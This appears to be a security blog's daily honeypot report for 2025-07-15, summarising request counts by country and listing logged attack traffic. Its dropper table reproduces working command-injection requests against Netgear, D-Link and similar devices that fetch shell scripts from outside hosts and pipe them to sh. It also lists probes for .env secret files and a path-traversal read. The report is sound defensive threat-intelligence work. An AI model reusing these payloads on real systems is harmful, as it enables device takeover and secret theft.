Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-07-15

·597 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-15
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 11 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 53 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1276 requests were recorded during the day, originating from 11 different countries, with a peak of 485 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
USGermany
USGermany
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
45.135.194.11POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.tbk.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.tbk.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.tbk.sh%29%20%7C%20sh%3B%29%3Becho%20 HTTP/1.1
45.135.194.11GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3B%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%29%20%7C%20sh%3B%27 HTTP/1.1
183.252.52.229GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.237.234GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.netgear.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.netgear.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.netgear.sh%29%20%7C%20sh&curpath=%2F&currentsetting.htm=1 HTTP/1.1
45.135.194.11GET /login.cgi?multilingual%20show%27%3B%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%29%20%7C%20sh%3B%27%24 HTTP/1.1
113.200.121.71GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.230.66.123GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.123:11401/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
47.236.247.145GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.208.212GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
120.77.56.42GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
503GET /dispatch.asp HTTP/1.1
712GET /depot/1238681/chunk/4dd971c1e85e3f6381f75400c449954f9adc44bb HTTP/1.1
722h\x01\x00fM2\x05\x00\xFF\x01\x06\x00\xFF\x09\x05\x07\x00\xFF\x09\x07\x01\x00\x00!5/////./..//////./..//////./../flash/rw/store/user.dat\x02\x00\xFF\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xFF\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00
942GET /.env-compose HTTP/1.1
952GET /.env-journal HTTP/1.1
1002GET /.env.ini.bak HTTP/1.1
1012GET /.env-backend HTTP/1.1
1032GET /.env-ssl-key HTTP/1.1
1062GET /.env-app.yml HTTP/1.1
1072GET /.env-key.pem HTTP/1.1
1082GET /.env.dev.bak HTTP/1.1
1092GET /.env-cypress HTTP/1.1
1102GET /.env.mongodb HTTP/1.1
2911GET /Odin/http/call1752598351 HTTP/1.1
2921GET /OdinHttpCall1752598351 HTTP/1.1
2931GET /odinhttpcall1752598351 HTTP/1.1
2941\x00\x0E8\xC6\xE2\xC8w&\xB6\xB2\xCD\x00\x00\x00\x00\x00
3671GET /.env-crack HTTP/1.1
3681GET /.env-junit HTTP/1.1
3691GET /.env-proxy HTTP/1.1
3701GET /.env-guide HTTP/1.1
3711GET /.env_hooks HTTP/1.1
3721GET /.env_oauth HTTP/1.1
3741GET /.env-auth0 HTTP/1.1
3751GET /app/.env.1 HTTP/1.1
3761GET /app/.env.2 HTTP/1.1
3771GET /auth/.env~ HTTP/1.1
3891\x00\x0E8\xC3\xDB\x9B\x8Ft\xD7\xEF#\x00\x00\x00\x00\x00
3951GET /.env-latency HTTP/1.1
3981GET /.env-karma HTTP/1.1
3991\x00\x0E\x08\xDDr\xBA\xC5\xDF\x12\xCFj\x00\x00\x00\x00\x00
4171GET /Odin/http/call1752588900 HTTP/1.1
4181GET /OdinHttpCall1752588900 HTTP/1.1
4191GET /odinhttpcall1752588900 HTTP/1.1
4231GET /Odin/http/call1752588106 HTTP/1.1
4241GET /OdinHttpCall1752588106 HTTP/1.1
4251GET /odinhttpcall1752588106 HTTP/1.1
4301\x00\x0E8\xDDr\xBA\xC5\xDF\x12\xCFj\x00\x00\x00\x00\x00
4311GET /.env.admin HTTP/1.1
4321GET /\x5C\x22/.env\x5C\x22, HTTP/1.1
4331GET /Theme/.env HTTP/1.1
4341GET /ci/cd/.env HTTP/1.1
4391GET /.env_vault HTTP/1.1
4401GET /api/.env.~ HTTP/1.1
4411GET /.env_token HTTP/1.1
4421GET /.env_tasks HTTP/1.1
4431GET /api/.env.2 HTTP/1.1
4441GET /api/.env.1 HTTP/1.1
4581\x00\x0E8\xBC\xE9
4611GET /0/env.json HTTP/1.1
4621GET /.env.token HTTP/1.1
4671\x00\x0E8\xBE\x9D0\xC8\x87\xABS-\x00\x00\x00\x00\x00
4931GET /infra/.env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0485US
1207GB
2111DE
369PL
466NL
541CA
635HK
733BG
828RU
927SC
1026IN
1125CN
1217SG
1315AU
149CH
158AO
167MU
176MN
186BR
196VN
206MD
214BE
223KR
233KZ
243FR
253PT
263NG
272ES
282SE
292IE
302IR
312AR
322IL
332KH
341MC
351SK
361CZ
371BD
381ID
391LV
401RS
411SI
421MX
431EE

Related

Report: 2025-07-14
·448 words
Repport Daily
Report: 2025-07-13
·322 words
Repport Daily
Report: 2025-07-12
·389 words
Repport Daily